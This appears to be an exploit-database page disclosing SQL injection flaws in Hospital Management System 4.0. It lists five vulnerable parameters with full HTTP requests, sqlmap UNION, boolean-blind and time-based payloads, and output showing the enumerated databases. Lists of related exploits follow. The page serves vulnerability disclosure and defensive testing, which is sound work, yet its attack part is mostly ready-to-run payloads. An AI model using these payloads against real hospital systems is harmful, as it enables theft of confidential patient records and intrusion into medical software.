Menu

Search for hundreds of thousands of exploits

"Hospital Management System 4.0 - 'searchdata' SQL Injection"

Author

Exploit author

FULLSHADE

Platform

Exploit platform

php

Release date

Exploit published date

2020-01-02

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
# Exploit Title: Hospital Management System 4.0 - 'searchdata' SQL Injection
# Google Dork: N/A
# Date: 2020-01-02
# Exploit Author: FULLSHADE
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/hospital-management-system-in-php/
# Version: v4.0
# Tested on: Windows
# CVE : N/A

# The Hospital Management System 4.0 web application is vulnerable to
# SQL injection in multiple areas, listed below are 5 of the prominent
# and easy to exploit areas.

================================ 1 - SQLi ================================

POST /hospital/hospital/hms/doctor/search.php HTTP/1.1
Host: 10.0.0.214
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Origin: https://10.0.0.214
DNT: 1
Connection: close
Referer: https://10.0.0.214/hospital/hospital/hms/doctor/search.php
Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5
Upgrade-Insecure-Requests: 1

searchdata=&search=

?searchdata parameter is vulnerable to SQL injection under the search feature in the doctor login.

POST parameter 'searchdata' is vulnerable.
sqlmap identified the following injection point(s) with a total of 120 HTTP(s) requests:
---
Parameter: searchdata (POST)
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: searchdata=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvxbq','zIuFTDXhtLrbZmAXQXxIalrRpZgCjsPnduKboFfW'),'qpqjq'),NULL-- PqeG&search=
---
[15:49:58] [INFO] testing MySQL
[15:49:58] [INFO] confirming MySQL
[15:49:58] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.41, PHP 7.4.1
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[15:49:58] [INFO] fetching database names
available databases [6]:
[*] hms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test

================================ 2 - SQLi ================================

GET parameter 'viewid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 40 HTTP(s) requests:
---
Parameter: viewid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: viewid=6' AND 3413=3413 AND 'nBkv'='nBkv

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: viewid=6' AND SLEEP(5) AND 'PJim'='PJim

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: viewid=6' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767071,0x7957464b6f4a78624b536a75497051715a71587353746a4b6e45716441646345614f725449555748,0x717a717a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- XNyp

[15:54:21] [INFO] fetching database names
available databases [6]:
[*] hms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test

GET /hospital/hospital/hms/doctor/view-patient.php?viewid=6 HTTP/1.1
Host: 10.0.0.214
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

?viewid parameter is vulnerable to SQLi while viewing a patient under the doctor login

================================ 3 - SQLi ================================

Parameter: bs (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: bp=123&bs=123' AND SLEEP(5) AND 'CKbI'='CKbI&weight=123&temp=123&pres=123&submit=

?bs parameter is vulnerable to SQL injection on the doctors login when adding medical history to a patient

================================ 4 - SQLi ================================

POST /hospital/hospital/hms/doctor/add-patient.php HTTP/1.1
Host: 10.0.0.214
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.214/hospital/hospital/hms/doctor/add-patient.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 111
Origin: https://10.0.0.214
DNT: 1
Connection: close
Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5
Upgrade-Insecure-Requests: 1

patname=

patname parameter is vulnerable to SQLi under the add patient in the doctor login

================================ 5 - SQLi ================================

---
Parameter: cpass (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: cpass=123' AND 4808=4808#&npass=123&cfpass=123&submit=123

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: cpass=123' AND SLEEP(5)-- taxP&npass=123&cfpass=123&submit=123
---
available databases [6]:
[*] hms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test

POST /hospital/hospital/hms/admin/change-password.php HTTP/1.1
Host: 10.0.0.214
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://10.0.0.214
DNT: 1
Connection: close
Referer: http://10.0.0.214/hospital/hospital/hms/admin/change-password.php
Cookie: PHPSESSID=g1mpom762nglpeptn51b4rg5h5
Upgrade-Insecure-Requests: 1

cpass=123&npass=123&cfpass=123&submit=123

the ?cpass parameter is vulnerable to blind SQL injection
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Simple College Website 1.0 - 'page' Local File Inclusion" webapps php Mosaaed
2020-12-02 "WordPress Plugin Wp-FileManager 6.8 - RCE" webapps php "Mansoor R"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover" webapps php "Mufaddal Masalawala"
2020-12-02 "WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-12-02 "Car Rental Management System 1.0 - SQL Injection / Local File include" webapps php Mosaaed
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution" webapps php zetc0de
2020-12-02 "WonderCMS 3.1.3 - Authenticated Remote Code Execution" webapps php zetc0de
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
2020-12-01 "Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS" webapps php yunaranyancat
Release Date Title Type Platform Author
2020-01-06 "FTPGetter Professional 5.97.0.223 - Denial of Service (PoC)" dos windows FULLSHADE
2020-01-06 "Complaint Management System 4.0 - 'cid' SQL injection" webapps php FULLSHADE
2020-01-06 "Hostel Management System 2.0 - 'id' SQL Injection" webapps php FULLSHADE
2020-01-06 "Small CRM 2.0 - Authentication Bypass" webapps php FULLSHADE
2020-01-02 "Hospital Management System 4.0 - 'searchdata' SQL Injection" webapps php FULLSHADE
2020-01-02 "Hospital Management System 4.0 - Persistent Cross-Site Scripting" webapps php FULLSHADE 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected